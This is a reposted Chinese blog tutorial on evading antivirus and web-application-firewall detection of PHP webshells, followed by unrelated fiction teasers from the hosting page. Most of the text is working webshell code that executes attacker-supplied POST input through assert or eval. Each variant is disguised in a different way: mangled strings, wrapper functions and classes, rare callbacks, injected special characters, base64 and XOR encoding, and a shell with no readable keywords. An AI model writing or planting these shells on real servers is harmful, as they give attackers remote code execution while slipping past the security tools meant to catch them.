webshelle免杀套路

转载自:https://nosec.org/home/detail/2574.html

webshell免杀套路

xiannv  44天前

0x01 前言

尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧

0x02 目录

关于eval 与 assert

字符串变形

定义函数绕过

回调函数

回调函数变形

特殊字符干扰

数组

编码绕过

无字符特征马

PHP7.1后webshell何去何从

总结

0x03 关于eval 于 assert

关于eval函数在php给出的官方说明是

eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号(),让系统认为该值是一个函数,从而当做函数来执行 通俗的说比如你 <?php $a=eval;$a()?> 这样是不行的 也造就了用eval的话达不到assert的灵活,但是在php7.1以上assert已经不行

关于assert函数

assert() 回调函数在构建自动测试套件的时候尤其有用,因为它们允许你简易地捕获传入断言的代码,并包含断言的位置信息。 当信息能够被其他方法捕获,使用断言可以让它更快更方便!

0x04 字符串变形

字符串变形多数用于BYPASS安全狗,相当对于D盾,安全狗更加重视"形" 一个特殊的变形就能绕过安全狗,看看PHP手册,有着很多关于操作字符串的函数

ucwords() //函数把字符串中每个单词的首字符转换为大写。

ucfirst() //函数把字符串中的首字符转换为大写。

trim() //函数从字符串的两端删除空白字符和其他预定义字符。

substr_replace() //函数把字符串的一部分替换为另一个字符串

substr() //函数返回字符串的一部分。

strtr() //函数转换字符串中特定的字符。

strtoupper() //函数把字符串转换为大写。

strtolower() //函数把字符串转换为小写。

strtok() //函数把字符串分割为更小的字符串

str_rot13() //函数对字符串执行 ROT13 编码。

由于PHP的灵活性操作字符串的函数很多,我这里就不一一列举了

用 substr_replace() 函数变形assert 达到免杀的效果

<?php

$a = substr_replace("assexx","rt",4);

$a($_POST['x']);

?>

其他函数类似 不一一列举了

0x05 定义函数绕过

定义一个函数把关键词分割达到bypass效果

<?php

function kdog($a){

    $a($_POST['x']);

}

kdog(assert);

?>

反之

<?php

function kdog($a){

    assert($a);

}

kdog($_POST[x]);

?>

效果一样,这种绕过方法,对安全狗还是比较有效的 在d盾面前就显得小儿科了 ,不过后面会讲到如何用定义函数的方法来 绕过d盾

0x05 回调函数

call_user_func_array()

call_user_func()

array_filter()

array_walk() 

array_map()

registregister_shutdown_function()

register_tick_function()

filter_var()

filter_var_array()

uasort()

uksort()

array_reduce()

array_walk()

array_walk_recursive()

回调函数大部分已经被安全软件加入全家桶套餐 所以找到一个生僻的不常用的回调函数来执行 比如

<?php

forward_static_call_array(assert,array($_POST[x]));

?>

这个函数能过狗,但是D盾显示是一级

0x05 回调函数变形

前面说过众多回调函数已经被加入豪华套餐了,怎么绕过呢,其实也很简单 那就是定义个函数 或者类来调用

定义一个函数

<?php

function test($a,$b){

    array_map($a,$b);

}

test(assert,array($_POST['x']));

?>

定义一个类

<?php

class loveme {

    var $a;

    var $b;

    function __construct($a,$b) {

        $this->a=$a;

        $this->b=$b;

    }

    function test() {

      array_map($this->a,$this->b);

    }

}

$p1=new loveme(assert,array($_POST['x']));

$p1->test();

?>

0x06 特殊字符干扰

特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能执行,网上广为流传的连接符

初代版本

<?php

$a = $_REQUEST['a'];

$b = null;

eval($b.$a);

?>

不过已经不能免杀了,利用适当的变形即可免杀 如

<?php

$a = $_POST['a'];

$b = "\n";

eval($b.=$a);

?>

其他方法大家尽情发挥如"\r\n\t",函数返回,类,等等

除了连接符号 还有个命名空间的东西 \ 具体大家可以看看php手册

<?php

function dog($a){

    \assert($a);

}

dog($_POST[x]);

?>

当然还有其他的符号熟读PHP手册就会有不一样的发现

0x07 数组

把执行代码放入数组中执行绕过

<?php

$a = substr_replace("assexx","rt",4);

$b=[''=>$a($_POST['q'])];

?>

多维数组

<?php

$b = substr_replace("assexx","rt",4);

$a = array($arrayName = array('a' => $b($_POST['q'])));

?>

0x08 类

说到类肯定要搭配上魔术方法比如 __destruct(), __construct()直接上代码

<?php

class me

{

  public $a = '';

  function __destruct(){

    assert("$this->a");

  }

}

$b = new me;

$b->a = $_POST['x'];

?>

用类把函数包裹,D盾对类查杀较弱

0x09 编码绕过

用php的编码函数,或者用异或等等 简单的base64_decode,其中因为他的正则匹配可以加入一些下划线干扰杀软

<?php

$a = base64_decode("YXNz+ZX____J____0");

$a($_POST[x]);

?>

异或

<?php

$a= ("!"^"@").'ssert';

$a($_POST[x]);

?>

0x9 无字符特征马

对于无特征马这里我的意思是 无字符特征

利用异或,编码等方式 例如p神博客的

<?php

$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';

$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';

$___=$$__;

$_($___[_]); // assert($_POST[_]);

利用正则匹配字符 如Tab等 然后转换为字符

利用POST包获取关键参数执行 例如

<?php

$decrpt = $_POST['x'];

$arrs = explode("|", $decrpt)[1];

$arrs = explode("|", base64_decode($arrs));

call_user_func($arrs[0],$arrs[1]);

?>

0x10 PHP7.1后webshell何去何从

在php7.1后面我们已经不能使用强大的assert函数了用eval将更加注重特殊的调用方法和一些字符干扰,后期大家可能更加倾向使用大马

总结

对于安全狗杀形,d盾杀参的思路来绕过。生僻的回调函数,特殊的加密方式,以及关键词的后传入都是不错的选择。 对于关键词的后传入对免杀安全狗,d盾,河马 等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化 用户可以对传出的post数据进行自定义脚本加密,再由webshell进行解密获取参数,那么以现在的软WAF查杀能力 几乎为0,安全软件也需要与时俱进了。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,590评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 86,808评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,151评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,779评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,773评论 5 367
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,656评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,022评论 3 398
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,678评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 41,038评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,659评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,756评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,411评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,005评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,973评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,203评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,053评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,495评论 2 343

推荐阅读更多精彩内容